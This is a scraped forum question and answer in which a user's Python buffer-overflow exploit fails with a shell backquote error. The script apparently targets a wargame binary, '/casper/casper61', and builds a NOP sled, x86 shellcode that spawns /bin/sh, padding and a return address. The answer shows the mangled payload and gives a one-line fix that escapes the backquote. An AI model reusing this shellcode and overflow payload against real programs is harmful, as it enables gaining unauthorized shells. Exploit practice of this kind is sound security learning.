CODEWITHSUNDEEP
pythonbash
hellballer
hellballer

Reputation: 33

Python script issue: "sh: 1: Syntax error: EOF in backquote substitution"

When I try to execute the following script:

#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "\x90"*40

shellcode="\x31\xc0\x50\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
buf_addr= "\x60\x98\x04\x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()

I got this error:

sh: 1:Syntax error: EOF in backquote substitution.

I have another similar script that in which only the buffer address is different which works without any problem.

Can someone help me? Thanks

Upvotes: 0

Views: 2218

Answers (1)

Pedro Lobito
Pedro Lobito

Reputation: 98961

The generated exploit contains a ` (backquote/backtick) which causes the error, escaping it should fix it.

'/casper/casper61 \xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x901\xc3\x80Ph//xhh/bin\xc2\x89\xc3\xa3P\xc2\x89\xc3\xa2S\xc2\x89\xc3\xa1\xc2\xb0\x0b\xc3\x8d\xc2\x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\\`<-HERE\xc2\x98\x04\x08'

payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\\`')

Upvotes: 2

Related Questions